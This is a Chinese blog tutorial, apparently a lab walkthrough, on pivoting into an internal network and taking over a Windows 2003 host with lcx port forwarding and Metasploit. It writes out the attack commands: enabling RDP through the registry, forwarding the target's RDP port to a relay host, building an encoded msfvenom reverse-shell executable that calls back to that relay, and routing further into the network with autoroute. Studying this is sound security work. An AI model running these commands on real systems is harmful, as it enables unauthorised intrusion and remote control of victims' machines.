Metasploit:利用lcx 端口转发进行内网渗透攻击Win 2003

最新推荐文章于 2023-07-10 19:46:49 发布
最新推荐文章于 2023-07-10 19:46:49 发布
阅读量1k 收藏 3
点赞数
原文链接:https://blog.csdn.net/God_XiangYu/article/details/98475688
版权

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

目录

利用lcx 端口转发进行内网渗透攻击Win 2003

内网渗透前期准备

lcx端口转发工具的使用

内网渗透正式开始

metasploit进行内网渗透

利用lcx 端口转发进行内网渗透攻击Win 2003

内网渗透前期准备

操作步骤

1. 内网渗透需要使目标主机与攻击主机不能互相连接,在攻击主机执行下面的iptable配置命令使得目标主机与攻击主机不能相互连接。参数-I是表示Insert(添加),-D表示Delete(删除)。后面跟的是规则,INPUT表示入站,10.1.1.134是攻击主机的IP,DROP表示放弃连接。

      iptables -I INPUT -s 10.1.1.134 -j DROP 屏蔽10.1.1.134主机

      iptables –L 列出iptables的所有规则

 

2. 测试攻击主机与目标主机之间能否相互连接。在操作系统没有设置禁止被ping的情况下,可以通过ping命令来判断两台主机之间是否能够互相连接。要求两台主机采用默认设置,都没有设置禁止被ping的策略,因此从下图可以看出两主机不能互相连接

      ping 10.1.1.134目标主机ping攻击主机失败 4

      ping 10.1.1.128攻击主机ping目标主机失败

 

lcx端口转发工具的使用

如果攻击主机有外网IP,但是目标主机属于内网,正常情况下无法直接连接内网主机的远程桌面,使用lcx的端口转发功能可以实现公网主机连接内网主机远程桌面。

操作步骤

1. 开启目标主机的远程桌面

      reg add    "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fDenyTSConnections /t REG_DWORD /d 0

2. 在公网主机执行“lcx –listen tran_port copy_port”端口转发,tran_port为转发端口,copy_port为tran_port的映射端口。将lcx拷贝到桌面,cmd进入桌面,执行下列命令。

      lcx -listen 1122 3300

 

3. 在漏洞主机上执行“lcx –slave attack_ip tran_port localhost_ip 3389”,attack_ip是攻击主机ip,tran_port是攻击主机监听的端口,localhost_ip是目标主机内网ip,3389是目标主机远程桌面使用的端口

      lcx -slave 10.1.1.143 1122 127.0.0.1 3389

公网主机打开远程桌面,试图连接目标机的远程桌面是否能成功连接

成功连接上,只要输入正确的密码就能登录

 

 

 

内网渗透正式开始

        前面讲解了端口的转发,现在开始正在的操作。

        我们都知道Metasploit 能够很好的处理攻击主机和目标主机至少有一个有外网ip的情况,却无法处理目标主机和攻击主机都是内网的情况。如果另有一台拥有外网IP的主机,那么在该主机上使用lcx的转发功能可以很好地协助metasploit进行内网渗透。

         这里有些之前的步骤,省略掉了,但只要你认真观看了lcx端口转发的操作步骤,这里一点问题都没得

操作步骤

1. 将lcx程序拷贝到桌面,cmd进入桌面后执行下列命令完成在公网主机使用lcx进行端口转发

      lcx –listen 8000 4000

 

metasploit进行内网渗透

2. kali 命令行运行msfconsole,启动metasploit

 

3. 使用exploit/multi/handler模块

      use exploit/multi/handler

4. 设置攻击负载

      set payload windows/meterpreter/bind_tcp

5. 查看绑定shell选项后设置连接公网ip的8000端口。由于实验二中在公网主机上执行了lcx –listen 8000 4000 命令,因此相当于在公网主机上运行的metasploit执行windows/meterpreter/bind_tcp模块,绑定的端口是4000

      set LPORT 8000

      set RHOST 10.1.1.143

show options 先查看配置选项

6. 设置公网主机IP和转发的8000端口

7. 命令行中执行msfvenom命令制作一个能连接公网主机4000端口的反弹shell

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.143 LPORT=4000 -a x86 --platform windows -e x86/shikata_ga_nai -i 5 -f exe -o /root/payload.exe

8. 攻击主机执行exploit命令后,将payload.exe拷贝到win2003主机并点击运行, 公网主机运行的lcx程序状态如下

      payload.exe拷贝方式可在实验机内用文件共享或直接使用lcx.rar下载包里的

运行

    攻击者Metasploit显示如下图所示Meterpreter信息表明攻击成功。

9. getuid命令查看权限,验证内网渗透成功  

      getuid

sysinfo,查看系统信息

8. 当然,我们还可以为metasploit添加到内网的路由,然后进行内网扫描。添加到内网的路由后,metasploit可以访问目标主机内网中的任意一台主机,后续步骤省略,篇幅所限,感兴趣的私底下网上了解。

      run autoroute -s 10.1.1.134

 

参考链接:

          http://kingworld00.blog.sohu.com/102574299.html

          http://blog.chinaunix.net/uid-22780578-id-3346350.html

          http://help.metasploit.com/

          http://www.metasploit.cn/forum.php

我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重

 

bylfsj
关注
专栏目录
内网渗透-Windows内网渗透
lza20001103的博客
08-15 1849
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
vps渗透内网win7主机
qq_40334963的博客
09-04 1684
准备 环境: win7:192.168.123.233 centos7:45.77.179.138 攻击Metasploit渗透框架 Cve-2018-8120本地提权执行文件 Windows exploit sugger(漏洞利用建议器) Putty执行文件 Lcxwindows下端口转发工具) Portmap (linux下端口转发工具) Saminside (破解系统用户密码) vp...
内网渗透利器lcx使用教程
08-19
LCX大家都很熟悉吧,实现的是端口转发的功能,适用于内网渗透已经远程控制等,发给新手学习
内网渗透---lcx使用
Armandhe的博客
06-21 524
lcx超简单
metasploit内网渗透
热门推荐
星落的博客
05-25 1万+
Pivoting 跳板/纽扣/支点 利用已经控制的一台计算机作为入侵内网的跳板 在其他内网计算机看来访问全部来源于跳板机 run autoroute -s 192.168.3.0/24#不能访问外网的被攻击目标内网网段 自动路由 现实场景 利用 win7 攻击 内网 win7 扫描内网:use auxiliary/scanner/portscan/tcp Pivoting 之端口转发Portfwd 利用已经被控计算机,在Kali与攻击目标之间实现端口转发 portfwd add -L .
Metasploit 内网渗透
weixin_30237719的博客
01-07 479
0x01reversetheshell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行。本地监听即可获得meterpretershell。 reverse_tcp/http/https=>exe=>victim=>shell reverse_tcp windows: msfpayloadwi...
Metasploit Portfwd(端口转发/重定向)
干铮的博客
03-23 963
Metasploit Portfwd端口抓发 获取meterpreter的shell后可进行端口转发操作,可以使用portfwd -h 转发入侵机器的端口。 先获取目标主机的shell建立连接 使用enable_rdp模块开启目标的远程连接 run post/windows/manage/enable_rdp portfwd add -l 3389 -p 3389 -r 192.168.28.131 rdesktop 127.0.0.1:3389 ...
渗透完全技巧.pdf
最新发布
10-03
8. **内网穿透**:在面对不同内网环境时,攻击者会使用LCX端口转发、HTTP代理、SOCKS代理等方式来穿透防火墙,建立内外网之间的通信通道。 以上所述是域渗透过程中的主要步骤和策略,这些知识对于网络安全防御者来...
内网渗透Windows反弹shell(综合)
墨鱼菜鸡
09-10 1084
目录 反向shell简介 01什么是正向shell 02什么是反向shell Windows反弹shell 01NC正向shell 01NC反向shell 02mshta.exe 通过Metasoloit的HTA Web Server模块发起HTA攻击 通过msfvenom生成恶意hta文件 03Rundll32.exe 04Reg...
渗透测试之内网渗透(四):端口转发
m0_74131821的博客
04-26 1965
在真实的错综复杂的企业环境中进行内网渗透,涉及内网穿透,端口转发,域渗透,提权等一系列的难题
Windows2003配置NAT端口映射
01-17
的NAT功能,将对该服 IP指定端口的访问转发到和该服务器所连接的内部局域网某台 NAT服务器的配置和内部局域网服务器的配置两部分: NAT服务器的配置 对Windows2003服务器的要求:拥有两张网卡,一张配置有公网IP,连接到 ,一张连接到内部局域网。为便于阐述,假设两张网卡IP配置如下: 公网网卡:IP=220.179.244.238,NetMask(子网掩码)=255.255.255.0, (网关)=220.179.244.129 局域网网卡:IP=192.168.0.1,NetMask=255.255.255.0,不配置GW 端口映射配置步骤: 从控制面板的“管理工具”打开“路由和远程访问”; 在打开的界面左边树形目录中,选择标识有(本地)名称的服务器,右键菜单 ,点击“下一步”; 在弹出的界面选择第2项:“网络地址转换(NAT)”,点击“下一步”; 在“Nat Internet连接”界面中选择公网IP的网卡,点击“下一步”; 在“网络选择”界面中选择连接到内部局域网的网卡,点击“下一步”; 点击“完成”按钮,windows2003自动启动服务。 路由选择”下将会有个“NAT/基本防 IP的那个 TAB,分别是“NAT/基本防火墙”、“地址池”、 1和第3项。 :接口类型选择“公用接口连接到Internet”,并确保“在 NAT”打勾,防火墙配置随意; 服务和端口是端口映射的重点,它配置的是对公网IP哪些端 IP和端口上。 “公用地址”表示连接到公网的接口,选 “协议”则根据服务的类型选择TCP或UDP;“传入端口”指对 “专用地址”指的是访问将会转发到的内部局域网中 IP地址;“传出端口”指的是访问被转发到内部局域网服务器的哪个 将该服务器的网关设置成NAT服务器的 IP即可。假设配置IP为192.168.0.2,子网掩码255.255.255.0,网 192.168.0.1。 NAT 220.179.244.238这个公网IP(即 ,否则是不会成功的。
lcx端口转发工具
04-11
lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.
使用Metasploit进行内网渗透
m0_51468027的博客
05-07 1692
一、网络拓扑图 假如我们拿到了一台主机比如Win2008的shell,如何通过该主机进行内网渗透,拿到比如下图中数据服务器的最高权限? 二、Win2008主机上线 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f exe > /var/www/html/w01ke.exe msfconsole use exploit/multi/handler set payload windows/meterpr
内网渗透工具介绍------Lcx.exe
weixin_34148508的博客
05-11 474
0x00简介 Lcx是一款端口转发工具,可以将内网机器的端口映射到带公网IP的机器上。一般进行渗透的时候,通过web漏洞getshell之后,需要对其进行远程登录,这就需要用到端口映射。 0x01使用 第一步:在内网主机上上传lcx.exe文件,执行 Lcx.exe –slave RemoteHost RemotePort LocalHost LocalPort 如图中显示则连接成功 第二步:...
Metasploit内网渗透大杀器
Grey的博客
03-30 3225
一、基础用法1.数据库连接#1 首先启动postgresql数据库:/etc/init.d/postgresql start;或者 service postgresql start;#2 初始化MSF数据库(关键步骤!):msfdb init;#3 运行msfconsole:msfconsole;#4 在msf中查看数据库连接状态:db_status。如果不想每次开机都这样,还可以配置随系统启动u...
Windows2003端口映射
weixin_34043301的博客
11-10 148
本文介绍的端口映射指的是利用Windows2003服务器的NAT功能,将对该服务器上某个公网IP指定端口的访问转发到和该服务器所连接的内部局域网某台服务器上。 配置分为NAT服务器的配置和内部局域网服务器的配置两部分: 一、NAT服务器的配置 对Windows2003服务器的要求:拥有两张网卡,一张配置有公网IP,连接到Internet,一张连接到内部局域网。为便于阐述,假设两张...
利用metasploit渗透内网的机器
weixin_30908707的博客
05-19 224
今天来到一个大的计算机教室然后看到清一色的Windows7的电脑,首先就想到了昨年大名鼎鼎的勒索病毒 这个勒索病毒是利用了SMB服务的漏洞,微软的漏洞编号是ms17-010.可以来试一试! 先看看这台电脑打过哪些补丁,控制面板-程序-查看已安装的更新-然后时间排序 也可以利用cmd命令systeminfo来查看打过哪些补丁,然后搜一下就知道最后补丁更新的时间了,我觉得控制面板看起来直接一...
渗透——利用lcx反弹端口获取内网机器远程桌面
爱国小白帽
03-17 2006
使用场景 外网不能访问内网目标机,但是可以访问内网跳板机,目标机3389端口只能本地访问,此时我们要用外网连接目标机的远程桌面 如图: 实验环境: Windows Server 2008 R2 x64(跳板机) Windows Server 2003(目标机) lcx.exe Lcx工具有三个参数功能如下: listen 监听端口 tran 将一个端口的流量转发到另一个端口 s...
内网渗透——Metasploit的代理转发
m0_65544268的博客
07-10 754
计算机配置==》管理模块==》网络==》Lanman工作站==》启用不安全的来宾登录。7)使用proxychains4测试访问主机2上的IIS。win10/11有可能没有打开服务,导致无法访问共享。lhost: 0.0.0.0 指定主机2本机地址。3)被攻击主机1运行生成的1111.exe文件。这样我们就实现了第一个主机上线的过程了。2)在已经上线的主机1上创建代理转发功能。出现这样的页面就说明添加路由成功了。这样我们就实现了三台主机上线了。10)主机2运行2222.exe。
Metasploit:安全漏洞检测与渗透攻击工具详解
Metasploit是一款强大的开源安全漏洞检测和渗透测试工具,它的核心价值在于其集成了多种平台上的溢出漏洞和流行shellcode,使得攻击者可以方便地进行渗透攻击Metasploit建立在Metasploit Framework (MSF)之上,这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值